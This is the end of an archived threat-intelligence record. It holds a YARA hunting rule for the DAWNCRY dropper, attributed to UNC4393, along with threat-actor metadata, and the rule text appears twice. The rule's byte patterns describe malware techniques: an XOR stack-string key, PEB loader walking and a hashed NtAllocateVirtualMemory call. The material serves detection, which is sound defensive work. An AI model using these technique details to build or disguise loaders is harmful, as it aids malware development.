\r\n}\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 16 of 17\n\nDAWNCRY\r\nrule M_Dropper_DAWNCRY_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n family = \"DAWNCRY\"\r\n md5 = \"a9447a25ab79eed2942997daced4eb3e\"\r\n platform = \"Windows\"\r\n \r\n strings:\r\n $stackstring_xor_key = {C6 85 [4] 65 C6 85 [4] 69 C6 85\r\n[4] 55 C6 85 [4] 56 C6 85 [4] 79 C6 85 [4] 72 C6 85 [4] 79 C6 85\r\n[4] 67 C6 85 [4] 6C C6 85 [4] 3E C6 85 [4] 58 C6 85 [4] 45 C6 85\r\n[4] 2A C6 85 [4] 5E C6 85 [4] 71 C6 85 [4] 78 C6 85 [4] 45 C6 85\r\n[4] 59 C6 85 [4] 69 C6 85 [4] 49 C6 85 [4] 56 C6 85 [4] 56 C6 85\r\n[4] 61 C6 85 [4] 38 C6 85 [4] 34 C6 85 [4] 4C C6 85 [4] 00}\r\n $part_of_xor_decrypt = {48 01 ?? 0F B6 84 [5] 44 31 C8 41\r\n88 ?? 48 83 85 [4] 01 48 8B [5] 48 39 [5] 0F 82 }\r\n $peb_ldr_data = {48 31 C0 65 48 8B 04 25 60 00 00 00 48\r\n8B 40 18 48 8B 40 20 48 8B 00 48 8B 40 20 C3}\r\n $hardcoded_ntAllocateVirtualMemory_hash = {BA E2 A5\r\n92 6D 48 89 C1 E8}\r\n condition:\r\n (uint16(0)==0x5A4D and uint32(uint32(0x3C))==0x00004550)\r\nand 3 of them\r\n \r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 17 of 17\n\nplatform strings: = \"Windows\"   \n$stackstring_xor_key  = {C6 85 [4] 65 C6 85 [4] 69 C6 85\n[4] 55 C6 85 [4] 56 C6 85 [4] 79 C6 85 [4] 72 C6 85 [4] 79 C6 85\n[4] 67 C6 85 [4] 6C C6 85 [4] 3E C6 85 [4] 58 C6 85 [4] 45 C6 85\n[4] 2A C6 85 [4] 5E C6 85 [4] 71 C6 85 [4] 78 C6 85 [4] 45 C6 85\n[4] 59 C6 85 [4] 69 C6 85 [4] 49 C6 85 [4] 56 C6 85 [4] 56 C6 85\n[4] 61 C6 85 [4] 38 C6 85 [4] 34 C6 85 [4] 4C C6 85 [4] 00}\n$part_of_xor_decrypt  = {48 01 ?? 0F B6 84 [5] 44 31 C8 41\n88 ?? 48 83 85 [4] 01 48 8B [5] 48 39 [5] 0F 82 } \n$peb_ldr_data  = {48 31 C0 65 48 8B 04 25 60 00 00 00 48\n8B 40 18 48 8B 40 20 48 8B 00 48 8B 40 20 C3} \n$hardcoded_ntAllocateVirtualMemory_hash   = {BA E2 A5\n92 6D 48 89 C1 E8}   \ncondition:    \n(uint16(0)==0x5A4D  and uint32(uint32(0x3C))==0x00004550)  \nand 3 of them   \n}    \nPosted in    \nThreat Intelligence   \nSource: https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight    \n   Page 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight"
	],
	"report_names": [
		"unc4393-goes-gently-into-silentnight"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "908cf62e-45cd-492b-bf12-d0902e12fece",
			"created_at": "2024-08-20T02:00:04.543947Z",
			"updated_at": "2026-04-10T02:00:03.68848Z",
			"deleted_at": null,
			"main_name": "UNC4393",
			"aliases": [
				"Storm-1811",
				"CURLY SPIDER",
				"STAC5777"
			],
			"source_name": "MISPGALAXY:UNC4393",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "50fd5da4-c2f3-4a35-aebe-14f86fd567cb",
			"created_at": "2025-03-04T02:00:02.997969Z",
			"updated_at": "2026-04-10T02:00:03.813132Z",
			"deleted_at": null,
			"main_name": "UNC3973",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC3973",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434486,
	"ts_updated_at": 1775791896,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/11aff090bd59803ed7a2e8cf4eab0a9233176e67.pdf",
		"text": "https://archive.orkl.eu/11aff090bd59803ed7a2e8cf4eab0a9233176e67.txt",
		"img": "https://archive.orkl.eu/11aff090bd59803ed7a2e8cf4eab0a9233176e67.jpg"
	}
}